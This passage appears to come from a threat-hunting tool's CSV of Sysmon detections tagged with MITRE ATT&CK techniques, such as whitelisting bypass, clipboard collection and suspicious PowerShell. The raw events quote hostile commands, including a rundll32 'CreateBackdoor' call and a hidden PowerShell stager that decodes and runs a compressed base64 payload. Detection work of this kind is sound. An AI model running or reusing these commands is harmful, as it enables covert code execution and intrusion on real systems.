cmd /c netsh trace stop ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4950 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:58.370 + 747F3D96-6646-5D3F-0000-0010913A8B00 + 6232 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c netsh trace stop + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.46327,2020-03-21T09:00:25.463270+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243558 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.452 + 747F3D96-9F69-5E75-0000-001035972000 + 1388 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 336 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:44:50.348 + 747F3D96-2842-5E1E-0000-00100C417A00 + 4180 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 url.dll,FileProtocolHandler ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-2842-5E1E-0000-0020FF3A7A00 + 0x7a3aff + 0 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-2842-5E1E-0000-0010903C7A00 + 1628 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 336 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:44:50.348 + 747F3D96-2842-5E1E-0000-00100C417A00 + 4180 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 url.dll,FileProtocolHandler ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-2842-5E1E-0000-0020FF3A7A00 + 0x7a3aff + 0 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-2842-5E1E-0000-0010903C7A00 + 1628 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.46327,2020-03-21T09:00:25.463270+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243558 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.452 + 747F3D96-9F69-5E75-0000-001035972000 + 1388 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1556656012.371714,2019-05-01T00:26:52.371714+04:00,,Threat,Critical,"Found User (NT AUTHORITY\SYSTEM) run Suspicious PowerShell commands that include ( -c ,[Convert]::FromBase64String,hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden , -c ,[Convert]::FromBase64String,hidden,Hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden ,WindowStyle) in event with Command Line ("powershell.exe" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))) and Parent Image :C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , Parent CommandLine (powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);") in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9809 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:26:52.356 + 365ABB72-AF8C-5CC8-0000-001003361900 + 2484 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "powershell.exe" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-2586-5CC9-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-AF8B-5CC8-0000-0010AC1B1900 + 3872 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1594332367.487274,2020-07-10T02:06:07.487274+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 311382 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-07-09 22:05:55.880 + 747F3D96-94C3-5F07-0000-001080B40100 + 3096 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-1350-5F08-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 00000000-0000-0000-0000-000000000000 + 628 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1115] Clipboard Data Collection,1594376435.589722,2020-07-10T14:20:35.589722+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rdpclip.exe ) through command line ( rdpclip ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 311396 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-07-10 10:20:34.877 + 747F3D96-40F2-5F08-0000-0010D8A92C00 + 3304 + C:\Windows\System32\rdpclip.exe + 10.0.17763.1131 (WinBuild.160101.0800) + RDP Clipboard Monitor + Microsoft® Windows® Operating System + Microsoft Corporation + rdpclip.exe + rdpclip + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-94CD-5F07-0000-0020ABBF0300 + 0x3bfab + 1 + Medium + SHA1=0265C1718EC95B025D9719F3B4872826F8F4661F,MD5=9E089ECF8B86983B7A77E3844CD02BB5,SHA256=AF5CAE4B514215E530643A7FEA2D7A47A1B15F6E5610347B217D1ABFA4AE0F92,IMPHASH=E3F33CEBF67721DAC951AFBD20321206 + 747F3D96-1350-5F08-0000-001014C50000 + 824 + C:\Windows\System32\svchost.exe + C:\Windows\System32\svchost.exe -k NetworkService -s TermService + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.46327,2020-03-21T09:00:25.463270+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243558 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.452 + 747F3D96-9F69-5E75-0000-001035972000 + 1388 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1138] Application Shimming - process,1553028568.168278,2019-03-20T00:49:28.168278+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966403 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:49:28.058 + 365ABB72-55D8-5C91-0000-001060C90700 + 3648 + C:\Windows\System32\sdbinst.exe + 6.0.7600.16385 (win7_rtm.090713-1255) + Application Compatibility Database Installer + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\sdbinst.exe" -q -u "C:\Windows\AppPatch\Test.SDB " + C:\Windows\System32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F + 365ABB72-551C-5C91-0000-001030590500 + 2704 + C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe + "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1556656012.371714,2019-05-01T00:26:52.371714+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "powershell.exe" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object 